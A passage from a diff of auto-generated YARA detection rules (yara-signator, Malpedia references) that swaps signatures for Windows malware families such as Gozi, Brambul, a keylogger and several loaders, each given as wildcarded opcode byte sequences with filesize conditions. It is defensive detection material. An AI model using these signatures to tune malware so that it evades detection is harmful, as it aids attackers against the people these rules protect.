8d8d50f7ffff e9???????? 8b85fcf4ffff 50 e8???????? 59 } condition: - 7 of them and filesize <242688 + 7 of them and filesize <704512 } -rule MALPEDIA_Win_Fast_Pos_Auto : FILE +rule MALPEDIA_Win_Webc2_Table_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b4b0c9d-f48b-554f-8a11-82dc9864cf63" + id = "398ecdfa-bd77-5001-b308-7e740d6a25e6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fast_pos_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_table_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "cc5eee3320509f0e654a55f4440afe73bd9962689fcfc57ca050257ab2933ad2" + logic_hash = "659cc34946aa5d8ea6957b273afd39f56e48147569d9730da4a86aafe181a1ab" score = 75 quality = 75 tags = "FILE" @@ -139973,32 +142877,32 @@ rule MALPEDIA_Win_Fast_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c785e4feffff04010000 ff15???????? e8???????? 8bc8 33c0 } - $sequence_1 = { e8???????? 8b95e4feffff 83c408 85c0 0f9485ebfeffff 83c2f0 } - $sequence_2 = { 52 8d8de0feffff e8???????? 8bb5e0feffff 6a44 8d857cfeffff } - $sequence_3 = { 6a00 6a00 68???????? ffb5e8feffff ff15???????? 85c0 7517 } - $sequence_4 = { c645fc07 e8???????? 8bf0 c645fc08 ff15???????? } - $sequence_5 = { 68???????? 56 c785e8feffff01000000 e8???????? 83c40c 8bc6 } - $sequence_6 = { 68ffff1f00 ff15???????? 6a00 50 } - $sequence_7 = { e8???????? 6a10 68???????? 68???????? 6a00 ff15???????? 6a00 } - $sequence_8 = { 50 ff36 8d85e0feffff 68???????? } - $sequence_9 = { 5d c20400 8b01 6a01 ff76f4 ff10 8bf8 } + $sequence_0 = { 8d85e4feffff 50 ff75fc ff15???????? 85c0 0f8461010000 } + $sequence_1 = { 83c410 881d???????? 8345fc04 ff4dec 0f8567feffff } + $sequence_2 = { 8dbda1fcffff 889da0fcffff f3ab 66ab aa 8d859cfbffff 6804010000 } + $sequence_3 = { 53 894dec ffd6 59 } + $sequence_4 = { 8b45f4 bf???????? 57 50 885c30f4 8b35???????? } + $sequence_5 = { 50 53 ff15???????? 85c0 750a ff15???????? 32c0 } + $sequence_6 = { ff75fc 8d85bcfdffff 50 e8???????? 59 } + $sequence_7 = { 50 8945e8 e8???????? 83c40c 895df8 8d45c4 } + $sequence_8 = { e8???????? 0fb745e0 50 0fb745de 50 } + $sequence_9 = { ff7508 6a01 50 ff15???????? 56 } condition: - 7 of them and filesize <327680 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Harnig_Auto : FILE +rule MALPEDIA_Win_Klrd_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4db6d1ff-ae88-5c90-aeff-64f63eac36fc" + id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.harnig_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.klrd_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "278559dff9c1abda460af9efb2388b0afb57c006c8438cf3b67adcf26f15e5f4" + logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a" score = 75 quality = 75 tags = "FILE" @@ -140012,32 +142916,32 @@ rule MALPEDIA_Win_Harnig_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c20800 6a05 ff742408 e8???????? c20400 53 } - $sequence_1 = { 8bca 8dbde8fbffff f3ab 8d45f0 50 8d85e8fbffff } - $sequence_2 = { ffd0 eb0b 68???????? ff15???????? 8bc8 } - $sequence_3 = { 03c1 5e c9 c20800 8b542404 8a0a 33c0 } - $sequence_4 = { 0bc6 5e c20800 6a05 } - $sequence_5 = { 56 8d85e0fdffff 50 ffd3 8d45e0 50 } - $sequence_6 = { 56 57 ba00010000 33c0 8bca 8dbde8f7ffff f3ab } - $sequence_7 = { 85c0 746b 8b45f8 68f1cbf7ae } - $sequence_8 = { ff5150 8b45fc 8b08 8d9524fdffff 52 8d9590feffff } - $sequence_9 = { 8a0a 33c0 84c9 7419 56 8bf0 } + $sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 } + $sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? } + $sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 } + $sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 } + $sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c } + $sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? } + $sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f } + $sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? } + $sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 } + $sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? } condition: - 7 of them and filesize <49152 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Babar_Auto : FILE +rule MALPEDIA_Win_Brambul_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "907c27e3-2fb8-508f-9c67-d8826ced6045" + id = "fb37501d-8a53-5cc7-864b-a2eff1ebf028" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.babar_auto.yar#L1-L166" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brambul_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "8e0331df8b3130917de8e5e3d5d2fa36fbe1f95285a5ec05160d56f936d6e114" + logic_hash = "b2fcad7678e1145848466f51e53045ab3d4628142b8e9b03697218392aef0c7d" score = 75 quality = 75 tags = "FILE" @@ -140051,38 +142955,38 @@ rule MALPEDIA_Win_Babar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3bd6 0f86f9feffff 8b54243c 8b442438 } - $sequence_1 = { 3bd6 0f8c7affffff 8bbc24d0000000 ddd9 } - $sequence_2 = { 3bd5 7e47 8d0c9500000000 2bd9 } - $sequence_3 = { 3bd5 0f8671ffffff 8144241890020000 ddd8 816c242880020000 83c710 81c680020000 } - $sequence_4 = { 46 8d44af08 8d5708 8d4cb500 d942f8 } - $sequence_5 = { 3bd6 0f82eefeffff 8b742458 03f5 } - $sequence_6 = { 3bd6 721b 57 8bcb } - $sequence_7 = { 3bd6 72d9 33f6 eb08 } - $sequence_8 = { 8906 0f8496000000 50 ffd7 894604 8b0d???????? 894e08 } - $sequence_9 = { 8d8407d8988069 c1c007 8bfa 03c6 33fe } - $sequence_10 = { 803800 8b0d???????? 741d 803900 7506 8b0d???????? 8a11 } - $sequence_11 = { 23d1 33d0 0354244c 8d94322108b449 c1ca0a 03d1 8bf1 } - $sequence_12 = { 57 8d3c85a09e0110 8b07 03c3 8a4824 } - $sequence_13 = { e8???????? 57 e8???????? 83c410 8d842480000000 50 ffd5 } - $sequence_14 = { 0fb64e04 884804 8b5604 c1ea08 885005 0fb64e06 } - $sequence_15 = { 8b4b04 55 8b2d???????? 68???????? } + $sequence_0 = { 66390a 750c 663908 8dbc5dc4000000 } + $sequence_1 = { d3e0 48 234508 8d0440 } + $sequence_2 = { 83f801 7269 6a08 6a40 ff15???????? 8b542414 } + $sequence_3 = { 8bd9 33ee c1eb14 c1e10c } + $sequence_4 = { c1e311 0bf3 8b5824 03f2 23ee 33e9 } + $sequence_5 = { 6800400000 6a00 ff15???????? 50 ff15???????? 8bd8 } + $sequence_6 = { 6a05 89b5b049ffff 58 8985a849ffff } + $sequence_7 = { 25ffff0000 3bf8 7cc9 8bc6 5f 5e 5d } + $sequence_8 = { 8d54242c c1e902 f3a5 8bc8 8d442470 } + $sequence_9 = { 68???????? ff15???????? 83c408 b804000000 5f 5e 5d } + $sequence_10 = { 8b8c2480010000 89942418010000 8984241c010000 8d942418010000 51 8d84245c010000 } + $sequence_11 = { 8d45e8 50 8bf3 8d85be49ffff 83e31f 83a5b85dffff00 } + $sequence_12 = { 89b404bc000000 83c004 83f840 7cd0 b910000000 } + $sequence_13 = { 8d7c2420 f3ab 8d442424 50 56 53 } + $sequence_14 = { 50 e8???????? 83f8ff 7517 8d4c2410 } + $sequence_15 = { c3 8b442404 c74050f0864000 c7401401000000 } condition: - 7 of them and filesize <1294336 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Dramnudge_Auto : FILE +rule MALPEDIA_Win_Rhino_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4e1e9905-62de-5567-9ed7-a82928870a8c" + id = "11a60875-723d-53d2-ab23-e9023e9a450c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dramnudge_auto.yar#L1-L90" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhino_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "221dd8bcd930b6121a924fbe6761de15c83c657ddce0c9178183beb8828f75f7" + logic_hash = "06d154dd08a9cc876dd4f55564b3f05b1da55b4793bd9c16429a3bb1cbe16dda" score = 75 quality = 75 tags = "FILE" @@ -140095,33 +142999,35 @@ rule MALPEDIA_Win_Dramnudge_Auto : FILE malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" - strings: - $sequence_0 = { 014218 eb18 03c3 8bd3 } - $sequence_1 = { 000c00 20b140005f5f 7277 7374 } - $sequence_2 = { 014318 8b430c 2b4308 03c6 } - $sequence_3 = { 000c00 e0d9 40 007374 } - $sequence_4 = { 014318 8b4318 8b55f8 03d6 } - $sequence_5 = { 007374 643a3a 7275 6e } - $sequence_6 = { 0000 90 000c00 20b140005f5f } - $sequence_7 = { 014318 eb5b 33f6 eb01 } - + strings: + $sequence_0 = { 8b4160 c3 6a40 58 c3 b8???????? e8???????? } + $sequence_1 = { c745f00f000000 885ddc 53 be04010000 895dfc 56 8d4ddc } + $sequence_2 = { c1c105 8b400c 89442440 8bc5 034c2440 33c3 23c6 } + $sequence_3 = { 2b16 b8ffffff03 c1fa06 2bc2 3bc1 7217 8d040a } + $sequence_4 = { e8???????? 8bf9 897df0 8b7508 8d4f0c c74704???????? 56 } + $sequence_5 = { e8???????? 895d60 897d64 8b06 8d4de0 51 8bce } + $sequence_6 = { 890496 85c9 75e6 42 3b54240c 72ec 33c0 } + $sequence_7 = { 74af 8b4634 8d4d08 51 50 50 894508 } + $sequence_8 = { 5e 64890d00000000 c9 c3 8b514c 395148 57 } + $sequence_9 = { 8b4f14 8b4114 3b410c 7507 8bcf e8???????? 33c0 } + condition: - 7 of them and filesize <1294336 + 7 of them and filesize <1288192 } -rule MALPEDIA_Win_Unidentified_068_Auto : FILE +rule MALPEDIA_Win_Gozi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5159a6d8-1e34-506d-99d9-cd809f096743" + id = "4c65f4c6-680c-5313-afa1-f0c350a0bb9e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_068_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gozi_auto.yar#L1-L297" license_url = "N/A" - logic_hash = "89cc05fc50aa07230f88b9a05ad2adeb94c446a13f619795648893388c9d8285" + logic_hash = "d1afd0d2426cb263c17dc36f11639d4b538234ba95ec55283f83783334fcf5d3" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -140133,32 +143039,54 @@ rule MALPEDIA_Win_Unidentified_068_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 75ee 394624 7417 50 8bce e8???????? } - $sequence_1 = { 43 8bc8 3bde 72e6 8b75e0 8b5df4 8b55f8 } - $sequence_2 = { 85ff 741b 8b4674 ff7514 8b0c98 83c118 e8???????? } - $sequence_3 = { 59 57 8bd8 c745fc04000000 8d45fc 50 53 } - $sequence_4 = { 7406 8b08 50 ff5108 885d94 895df0 8d4df0 } - $sequence_5 = { 8d5648 8d4d88 e8???????? 59 83781408 7202 8b00 } - $sequence_6 = { 660f13442450 8b4c2454 894c2458 8b4c2450 894c2450 8b4c2464 894c2428 } - $sequence_7 = { d1f9 6a41 5f 894df0 8b34cd18aa4400 8b4d08 6a5a } - $sequence_8 = { 72ba 33f6 81fb10000020 0f45f3 85f6 7523 33db } - $sequence_9 = { 8d4948 e8???????? 33c0 5d c20800 55 8bec } + $sequence_0 = { 8b4dfc f3a4 b0e9 aa } + $sequence_1 = { ee 7f7b 36110b 33745571 de7e75 cd18 4a } + $sequence_2 = { 3327 72e7 3ebb4a68d947 d93e 257296bc4a 1b6b61 9f } + $sequence_3 = { e8???????? 0bc0 7522 6a01 6a00 } + $sequence_4 = { 2bfb 8b5518 8b12 6a00 } + $sequence_5 = { 4e b64e 0fc0d6 69d5920d9cef } + $sequence_6 = { 0fadce 80eede c0ca12 2af4 8af4 } + $sequence_7 = { 894598 50 e8???????? 8b4650 8b7c0704 } + $sequence_8 = { 83c101 894df4 8b55ec 83ea02 3955f4 0f8d45040000 } + $sequence_9 = { 94 6e 8ee1 54 } + $sequence_10 = { 7516 c78554ffffff06000000 c78558ffffff00000000 eb14 } + $sequence_11 = { bf???????? 8bdf c70747494638 66c747043761 83c706 8b450c } + $sequence_12 = { c9 50 0c73 0e 96 3b5375 } + $sequence_13 = { ffd7 03f0 56 53 33f6 56 } + $sequence_14 = { ad b710 2dc7ce5bbb d6 b6c6 } + $sequence_15 = { ff75e4 ffd0 c3 6a68 68???????? e8???????? } + $sequence_16 = { 0f8229feffff 5f 5e 5b c9 c21000 } + $sequence_17 = { c9 c20800 6a00 8d87950c0000 } + $sequence_18 = { 84c1 0fb3ea f6c1ba 0fce } + $sequence_19 = { 96 3b5375 60 d3e0 90 48 } + $sequence_20 = { 69d5ca659407 f6de c645ff61 a1???????? 8b0d???????? 6a00 } + $sequence_21 = { 83c101 894d90 0fb755e4 52 8b4590 } + $sequence_22 = { b87e8da638 e022 3a56b9 036890 2b02 9a102a6715fb53 } + $sequence_23 = { dc6f1b 95 bf633629a8 02738f } + $sequence_24 = { 83bd54ffffff03 7c0a c78554ffffff00000000 eb95 33c0 8b55f4 } + $sequence_25 = { 0fbe4415ec 8b8d4cffffff 038d58ffffff 0fbe11 33d0 8b854cffffff } + $sequence_26 = { 41 4e 75ea 5e } + $sequence_27 = { 0f8447010000 83f8ff 0f843e010000 682000cc00 56 } + $sequence_28 = { 837df800 75c7 ff75fc e8???????? c9 } + $sequence_29 = { 0fb3ce 86d6 2af4 b252 b0ca c745fc00000000 } + $sequence_30 = { e8???????? 59 8bf0 89b5e0f2ffff } + $sequence_31 = { 85c0 7404 8365f800 85f6 7407 8b06 } condition: - 7 of them and filesize <862208 + 7 of them and filesize <568320 } -rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE +rule MALPEDIA_Win_Tandfuy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16d4de33-3c54-5479-87ac-366869086324" + id = "38730032-1555-50d4-b759-37b770d675ac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nocturnalstealer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tandfuy_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "6f15e0c8b7c880f99f33b6a9409ba20c65fe7c5674e094de4ef3ad4c2fb61399" + logic_hash = "7ea6bc2b0de15e30b85cc41fe9dae28b9e373e31fa36302d55838d87545cc73b" score = 75 quality = 75 tags = "FILE" @@ -140172,71 +143100,71 @@ rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff3424 5e 56 e9???????? 81e945418082 01ca e9???????? } - $sequence_1 = { e9???????? 09d6 5f 81e220000000 ba00000000 81f700000080 81eeffffff7f } - $sequence_2 = { e9???????? 01742404 ff3424 5e 57 89e7 e9???????? } - $sequence_3 = { 89ef ba00020000 2524000000 09cb 05ffffff7f 81e6ffffff7f 81c7a2000000 } - $sequence_4 = { e9???????? 83c004 330424 310424 330424 5c 55 } - $sequence_5 = { b8b4888b7f 251810fb62 253a26e37e 05b68054fc 31c7 e9???????? 331c24 } - $sequence_6 = { e9???????? 8d852731bc18 52 89e2 50 b804000000 01c2 } - $sequence_7 = { e9???????? 895c2404 8b1c24 83c404 893424 890424 e9???????? } - $sequence_8 = { e9???????? 57 891c24 890424 e9???????? 81c704000000 81c704000000 } - $sequence_9 = { f7d8 f7d0 c1e808 c1e802 e9???????? 29cf 8b0c24 } + $sequence_0 = { 52 8b942458010000 25ff000000 81e1ff000000 50 } + $sequence_1 = { f68221eb6e0004 7403 40 ff01 ff01 40 e9???????? } + $sequence_2 = { e8???????? 83c404 85c0 0f8440010000 b93e000000 33c0 8dbdd8f9ffff } + $sequence_3 = { 8bec 8b4508 ff3485a0d66e00 ff15???????? 5d c3 55 } + $sequence_4 = { 6a00 51 6a02 52 56 ff15???????? 56 } + $sequence_5 = { 52 33c9 8a4801 51 33d2 8a10 } + $sequence_6 = { f3ab 8dbc2474020000 83c9ff f2ae f7d1 2bf9 8bc1 } + $sequence_7 = { 7562 b8???????? 81c49c000000 c3 83f806 7551 } + $sequence_8 = { 8d95e8feffff 8b7d08 83c9ff 33c0 f2ae f7d1 } + $sequence_9 = { 6800000080 56 f3ab ff15???????? 8bd8 } condition: - 7 of them and filesize <10739712 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Pvzout_Auto : FILE +rule MALPEDIA_Win_Ddkeylogger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bc80d9fe-85e4-55f8-8d8b-08382557b556" - date = "2023-01-25" - modified = "2023-01-26" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pvzout_auto.yar#L1-L115" + id = "32af4d2e-12e0-5512-a4a7-e09c0d4c8550" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ddkeylogger_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "3b1eb492455f147bf0fe300cd3d173313439f65c62c0ebecede0fab8aacab139" + logic_hash = "03458a2b11f7d3c85fa0851f46b24d084521ba159cb6b960088359db4227b8a0" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230124" - malpedia_hash = "2ee0eebba83dce3d019a90519f2f972c0fcf9686" - malpedia_version = "20230125" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3e3f 19e9 73f8 dca10ebd24e8 252b0026cb } - $sequence_1 = { 5a bf95f6810e 75a8 43 1dea50873a d4a1 } - $sequence_2 = { 9c b3d7 5a bf95f6810e 75a8 } - $sequence_3 = { bbedffffff 03dd 81eb00d00200 83bd8804000000 899d88040000 } - $sequence_4 = { 3089f33d80f3 48 e21c 3e3f } - $sequence_5 = { 5d bbedffffff 03dd 81eb00d00200 83bd8804000000 } - $sequence_6 = { 03dd 81eb00d00200 83bd8804000000 899d88040000 } - $sequence_7 = { d4a1 0e 75a8 43 } - $sequence_8 = { 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 8d8594040000 50 } - $sequence_9 = { 5a bf95f6810e 75a8 43 1dea50873a d4a1 0e } + $sequence_0 = { 8bf7 83e61f c1e606 03348580ee4500 } + $sequence_1 = { 51 894df4 8955fc 8945f8 e8???????? 83c408 } + $sequence_2 = { 8bc8 c1e902 f3a5 8bc8 8d95e8faffff 83e103 52 } + $sequence_3 = { 0fb64f08 80cbff d2e3 40 f6d3 205c30ff 0fb64f08 } + $sequence_4 = { 0405 c3 f6c20c 7409 f6c208 0f95c0 } + $sequence_5 = { 52 50 8b81e0000000 ffd0 837df804 75e8 } + $sequence_6 = { c745fc00000000 e8???????? 83c40c 8d85ccfaffff 50 8d8df0fdffff 51 } + $sequence_7 = { 50 57 ffd3 8945bc 8d45c8 50 } + $sequence_8 = { ff248d4cf74000 8d48cf 80f908 7706 6a03 } + $sequence_9 = { 6bc930 8975e0 8db1c0624100 8975e4 } condition: - 7 of them and filesize <573440 + 7 of them and filesize <808960 } -rule MALPEDIA_Win_Zitmo_Auto : FILE +rule MALPEDIA_Win_Polyvice_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f6f59970-f923-5e51-84d0-3f8e29574b3c" + id = "f632496e-a2f4-5ede-b8be-18463e7a5bac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zitmo_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyvice_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "a3b8b6f5916a461447d9c48219b755dccd1a5d708dba30f1dbbe42f800df788f" + logic_hash = "ed3286a18e97148fc13382a255519a25655dd929e966c75502c6a665bf5d62e5" score = 75 quality = 75 tags = "FILE" @@ -140250,32 +143178,32 @@ rule MALPEDIA_Win_Zitmo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03d7 8bde f7de ffb544feffff 53 e8???????? c9 } - $sequence_1 = { 55 8bec 81c47cffffff 317588 f7d7 f7df } - $sequence_2 = { 23d0 f7d9 8bd6 23d8 } - $sequence_3 = { c20400 55 8bec 81c410ffffff } - $sequence_4 = { 55 8bec 81c45cffffff 23cb 8bd6 f7d2 } - $sequence_5 = { 314dd8 f7d9 48 f7d2 03c1 ffb504ffffff } - $sequence_6 = { 4a f7d9 23c6 8bcb 46 } - $sequence_7 = { 4f e8???????? 8bca 03f7 e8???????? 23d7 } - $sequence_8 = { 81856cffffff36360000 03df f7d1 8bf8 } - $sequence_9 = { 6a36 6a36 51 ffb550feffff 6834340000 57 8d4d88 } + $sequence_0 = { 4589cf 4131ed 41c1cf06 4501e5 4589fc 4589cf 41c1cf0b } + $sequence_1 = { c1c207 31d1 4489c2 c1ca02 01f1 89d6 } + $sequence_2 = { 448b442438 01d1 01c1 4489c2 4489c0 c1c807 } + $sequence_3 = { 4409f6 89f5 89c6 4421f6 4421e5 09f5 4489de } + $sequence_4 = { 4c8d150fc20000 4801de 4c8d0d05ca0000 4c8d05fec50000 4883c310 8b3b 89f9 } + $sequence_5 = { 66418949fe 89e9 d3e8 4d39cb 75e2 4889d8 4829f0 } + $sequence_6 = { e9???????? 488d4dcc 31f6 e8???????? 4c8d3531650000 4989c5 eb2d } + $sequence_7 = { 53 4881ec38030000 488dac2480000000 410fb7400c 410fb77840 450fb77822 668945bc } + $sequence_8 = { 450fb6ec bf20000000 c744242800000000 0fb7db 4531ff } + $sequence_9 = { 0fb7c9 0fb74c4b02 664183f802 7508 6683f902 410f44c3 450fb7ed } condition: - 7 of them and filesize <843776 + 7 of them and filesize <369664 } -rule MALPEDIA_Win_Zerocleare_Auto : FILE +rule MALPEDIA_Win_Ceeloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3657cdfc-db20-5908-b80b-f3809b1ef7a0" + id = "385139d5-6e1c-5e2f-90c3-04a312f22353" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zerocleare_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ceeloader_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "684e088a58b2073463dab14cb1ba7b141fc0ac01570965634aebae02ef8b6f64" + logic_hash = "5733aa6d7aff1d1a6c42de98107a30359cd04782474df0d5ddf09cf2979a826e" score = 75 quality = 75 tags = "FILE" @@ -140289,33 +143217,33 @@ rule MALPEDIA_Win_Zerocleare_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { db2d???????? b801000000 833d????????00 0f854f6efeff ba05000000 8d0df0694400 e8???????? } - $sequence_1 = { 0f1185d8f7ffff f30f7e4010 660fd685e8f7ffff c7401000000000 c7401407000000 668908 c645fc04 } - $sequence_2 = { 6a00 8d45e8 50 6a18 } - $sequence_3 = { ffd6 6af4 898578f7ffff ffd6 } - $sequence_4 = { 0f114598 0f1145a8 ff15???????? 8bf8 } - $sequence_5 = { 895614 7410 c74620df494300 c74624f24a4300 eb0e c7462087414300 } - $sequence_6 = { c745e4ad184200 eb08 8d4dd8 e8???????? 837e1808 74f2 8bce } - $sequence_7 = { 660f58ca 660f2815???????? f20f59db 660f282d???????? 660f59f5 660f28aa70534400 660f54e5 } - $sequence_8 = { 8b04cdd40a4400 5f 5e 5b 8be5 5d c3 } - $sequence_9 = { 33c0 8985e4f7ffff 90 8b4c3814 8d1438 8d4101 } + $sequence_0 = { 3bce 33f6 23c7 0bda 8bde c3 0bd3 } + $sequence_1 = { 448b15???????? 4489c6 4431de 4589c3 4101f3 44891d???????? 4589c3 } + $sequence_2 = { 664589c2 664489942490030000 440fbe05???????? 4183f074 664589c2 664489942492030000 440fbe05???????? } + $sequence_3 = { 0bda 8bde 0bd3 3bce 23f3 7a04 0bda } + $sequence_4 = { 8b842420010000 3b84241c010000 0f8433000000 8b842420010000 898424dc000000 e8???????? 8b8c241c010000 } + $sequence_5 = { 3bdd 23fd 0bda 8bde 0bd3 3bce 5a } + $sequence_6 = { 741d 4885ff c6435401 488d0d53880800 480f45cf 48894b48 e8???????? } + $sequence_7 = { 88542433 0fbe05???????? 83f064 88c2 88542434 0fbe05???????? 83f076 } + $sequence_8 = { 4489a42464020000 4403bc2464020000 4489bc2460020000 448bbc2460020000 4589dc 4181e45d386101 4489a4245c020000 } + $sequence_9 = { 41c1e204 4489942448050000 44038c2448050000 44898c2444050000 448b8c2444050000 4189d2 4181e235913d02 } condition: - 7 of them and filesize <42670080 + 7 of them and filesize <2321408 } -rule MALPEDIA_Win_Wndtest_Auto : FILE +rule MALPEDIA_Win_Wininetloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a60fab9e-f350-5d99-8e55-84b700dcda0e" + id = "1f5f1063-d131-51ec-8fa2-72e334bf0ad8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wndtest_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader" + source_url = 